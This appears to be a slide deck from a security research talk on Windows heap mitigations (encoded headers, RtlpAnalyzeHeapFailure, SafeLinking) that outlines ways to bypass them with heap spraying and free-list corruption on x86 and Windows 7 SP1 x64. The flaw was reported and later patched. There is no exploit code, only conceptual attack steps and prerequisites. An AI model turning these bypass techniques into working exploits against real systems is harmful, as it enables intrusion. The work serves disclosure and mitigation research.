As @nicowaisman mentioned in his talk Aleatory Persistent Threat, old school heap specific exploiting is dying. And with each windows SP or new version, is harder to attack heap itself. Heap management adapt quickly and include new mittigation techniques. But sometimes is better to rethink the idea of mittigation and do this technique properly even half version of it will cover all known heap exploit techniques…
1. How safe is your link ?
Old school exploitation
vs
new mitigations
2. • Peter Hlavatý
• Specialized Software Engineer at ESET
• Points of interest :
• vulnerability research
• exploit mitigations
• kernel development
• bootkit research
• malware detection and removal algo
• @zer0mem
• research blog : http://zer0mem.sk/
#whoami
3. • As nico mentioned in his talk, Aleatory Persistent Threat, old
school heap specific exploiting is dying
• windows version ++ attack difficulty ++
• weak implementation == place for exploiting of mechanism
Introduction
5. Quick lookup at RtlpAllocateHeap FreeLists-UnLink-Search Algorithm
Really, some security improvements in algorithm are obvious...
• Validating / Encoding headers
• RtlpAnalyzeHeapFailure
• SafeLinking
6. • code1 = _Heap.EncodeFlagsMask ? code1 ^ _Heap.Encoding.Code1 : code1
• valid = code1.Flags ^ (BYTE)code1.Size ^ (code1.Size >> 8) == code1.SmallTagIndex
• size = code1.Size
• _Heap.EncodeFlagsMask initialy set to default value
• _Heap.Encoding.Code1 set to random value
I.Validating / Encoding headers
7. • cs:RtlpDiSableBreakOnFailureCookie
• x64 by default, x86 not!
• x86Win binaries by default
• What about 3rd party ?
• RtlpGetModifiedProcessCookie
• call NtQueryInformationProcess
II. RtlpAnalyzeHeapFailure
8. • heap_entry.flink.blink != heap_entry.blink.flink ||
heap_entry.flink.blink != heap_entry
• Pretty easy check don’t you think ?
III. SafeLinking
13. RULLING UNDER ENCODING LOGIC
• LowerBoundary of HEAP_ENTRY.Size :
• Interesting test :
_Heap.EncodeFlagsMask & HEAP_ENTRY.Code1
• If not matched, then it is not XORED!
• What about 0-size ?
Implementation shortcut
14. RULLING UNDER ENCODING LOGIC
• UpperBoundary (I.) of HEAP_ENTRY.Size :
• Interesting xoring value :
_Heap.Encoding.Code1 set to random value
• this case too much random == too much predicatability
• If (HEAP_ENTRY.Size set to 0101010101010101b)
then (_Heap.Encoding.Code1 ^ HEAP_ENTRY.Size)
high probability to be big number
Implementation shortcut
15. RULLING UNDER ENCODING LOGIC
• UpperBoundary (II.) of HEAP_ENTRY.Size :
• based on XOR
• two heap_entry chunks on freelist
• 1st set HEAP_ENTRY.Size to 0x8000
• 2nd set HEAP_ENTRY.Size to 0x0
• After XOR one of HEAP_ENTRY.Size will be for sure equal to
0x8000 which is big number
Implementation shortcut
18. • SafeLink Check
• HeapSpray fake list fulfill conditions
• Validation & RtlpAnalyzeHeapFailure?
• I am 3rd Party
• Problems :
• Works for x86 binaries
• Already fixed in win7sp1
Results ?
22. • Again, no validation here required
• Performance vs security ?
RtlpFreeHeap search in FreeLists
23. Previous IDEA – imporving ..
• What do you think happen with valid chunk, with size is bigger than size of already
overwritten HEAP_ENTRY, when it is attempted to be freed ?
26. • Same as in first attack :
• HeapSpray attack
• sizeof(HEAP_ENTRY) + sizeof(LIST_ENTRY>Flink)
overflow, that cause overwritting HEAP_ENTRY on FreeList
• Second attack specific :
• Ability to force application to free already used ‘good sized’
memory memory leak
• RW access to our heapsprayed buffer relinking
Prerequisites
34. • Conclusions :
• Mitigations are as good as they weakest point !
• Implement minimalistic approach, but cover all responsibilities
of the code
• Speed performance < safe environment
Done
35. • Reported to microsoft about 2 years ago
• But still present in win7sp1, and was usable even in win8CP !
• In final release of win8 it is finally patched!
• FreeListSearch algo now validate each walked
HEAP_ENTRY
Addition technique info
37. References
Brett Moore : Exploiting Freelist[0] On XP Service Pack 2
http://www.orkspace.net/secdocs/Windows/Protection/Bypass/Exploiting%20Freelist%5B0%5D%20On%20XP%20Service
%20Pack%202.pdf
Chris Valasek : Understanding the Low Fragmentation Heap
http://illmatics.com/Understanding_the_LFH.pdf
Brett Moore : Heaps About Heaps
http://seclists.org/vuln-dev/2008/Jul/0
Alexander Sotirov : Heap Feng Shui in JavaScript
http://www.blackhat.com/presentations/bh-europe-07/Sotirov/Presentation/bh-eu-07-sotirov-apr19.pdf
Nico Waisman : Aleatory Persistent Threat
http://media.blackhat.com/bh-us-10/presentations/Waisman/BlackHat-USA-2010-Waisman-APT-slides.pdf
… and many others usefull exploit techniques related materials …
Notes de l'éditeur
Outline :"I will start by reviewing the checks performed by SafeLink and the processing - (un)validating of the block headers. Following that, i will present the approach which can be used to satisfy the conditions of the linking/un-linking algorithm, and rule encoding mittagations as well. As next step i will show less strict approach which satisfy exploitation conditions of most of x86 binaries.After that, i will look deeper at conditions to full comprimise even x64 application on win7sp1 (/win8CP), present idea, look at the results and show live demo on win7sp1 - x64 application. Some conclusions follows.At the end of the talk, i will show video demo of exploitation of vulnerable proof-of-concept application (win8 x64, x86 plugin for IE, IE10). "